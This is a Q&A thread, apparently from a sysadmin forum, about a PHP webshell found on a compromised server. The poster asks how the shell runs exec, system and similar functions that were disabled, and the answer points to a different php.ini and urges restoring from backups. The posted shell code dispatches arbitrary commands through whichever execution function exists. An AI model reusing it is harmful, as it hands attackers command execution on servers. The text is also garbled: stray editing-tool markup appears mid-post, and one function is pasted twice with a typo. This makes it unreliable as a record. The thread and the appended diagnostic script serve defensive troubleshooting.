Linux – PHP functions are disabled, but somehow they can be executed

Tags: linux, PHP, security

I had a problem on my server today and discovered malicious code which an attacker used to gain access to my system.
I downloaded that PHP script, but what was weird is that I saw it using functions which are disabled in my PHP configuration.

Disabled are: passthru, exec, shell_exec, system, among others.

How is that possible?

This is part of the code:
</gre_replace>
<gr_replace lines="14-25" cat="clarify" orig="function get_execution_method()">
function get_execution_method()
{
 // Pick the last command-execution function that function_exists() reports as available
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}

function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}

Just to be sure that there are no leftovers, I copied that script to a new account which no one has access to except me. There is no .htaccess file or php.ini. The script still works on that account. I created a phpinfo file to see the PHP configuration for that file, and here are the disabled functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen

As you can see, the functions used in that script are listed among the disabled functions.

When I try to run one of the disabled functions I get this message:

Warning: system() has been disabled for security reasons in /home/user....

Just to make sure, I uploaded that script to a different server and the same was possible. That server also has the same disabled functions.

How can I prevent this from allowing someone access to my files?

Best Answer

Probably you are looking at the wrong php.ini. Confirm that the functions are disabled by creating a test.php containing the following in the same folder the malicious code was in, and navigate to it. Check disable_functions and confirm they are.

<?php
phpinfo();
?>

Most Apache installations on Linux support several ways of executing PHP code; check disable_functions in all your system-wide php.ini files with this:

grep -rn disable_functions /etc/php*/

Also check any php.ini and .htaccess in your /var/www.

Check the vhost logs, Apache logs and system logs.

Depending on the level of your system's compromise you may even be unable to see the actual configuration files in production for your services.

Edit: After reading your further comments I must suppose that your system is deeply compromised and you should (or, in your place, I would) stop wasting time and reinstall the system / restore from backups. Please take seriously into account that many files on your sites are probably compromised too. Restore from backups; don't take files from the compromised system to the new production environment.
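The check the answer describes, as an added diagnostic that is not part of the question or the answer: it reports which php.ini the serving SAPI actually loaded and whether each function from the question's list is genuinely gone in that context. The function list is taken from the question; everything else is assumed.

```php
<?php
// Added diagnostic, not part of the original question or answer. Request it over HTTP
// from the directory where the malicious script lived, so it runs under the SAME SAPI
// (mod_php, php-fpm or CGI): each SAPI loads its own php.ini, and the CLI's disable_functions
// says nothing about the web server's. The function list is taken from the question.
$suspect = ['exec', 'system', 'passthru', 'shell_exec', 'proc_open', 'popen', 'pcntl_exec'];

// Returns, per function, whether the loaded ini lists it and whether the engine still exposes it.
// function_exists() is the test the webshell uses, and it returns false for a disabled function,
// so "exists => true" here means the shell running under this SAPI could call it too.
function check_disabled(array $functions): array
{
    $listed = array_flip(array_filter(array_map('trim', explode(',', (string) ini_get('disable_functions')))));
    $rows = [];
    foreach ($functions as $fn) {
        $rows[$fn] = [
            'listed_in_ini' => isset($listed[$fn]),
            'exists'        => function_exists($fn),
        ];
    }
    return $rows;
}

header('Content-Type: text/plain');
// Which configuration this SAPI actually loaded; compare with the php.ini you edited.
printf("sapi:        %s\n", php_sapi_name());
printf("loaded ini:  %s\n", php_ini_loaded_file() ?: '(none)');
printf("scanned ini: %s\n", php_ini_scanned_files() ?: '(none)');
printf("disable_functions: %s\n\n", ini_get('disable_functions') ?: '(empty)');

$rows = check_disabled($suspect);
printf("%-12s %-14s %s\n", 'function', 'listed_in_ini', 'exists');
foreach ($rows as $fn => $r) {
    printf("%-12s %-14s %s\n", $fn, var_export($r['listed_in_ini'], true), var_export($r['exists'], true));
}

// Any function that still exists in this SAPI was not disabled by the file you changed.
$open = array_keys(array_filter($rows, function ($r) { return $r['exists']; }));
echo $open
    ? "\nNOT disabled under this SAPI: " . implode(', ', $open) . "\n"
    : "\nAll suspect functions are disabled under this SAPI.\n";
```

Run it once per way PHP is served (mod_php, php-fpm, CGI, CLI): the "loaded ini" line is the file whose disable_functions you need to correct, and the script should be deleted as soon as the check is done.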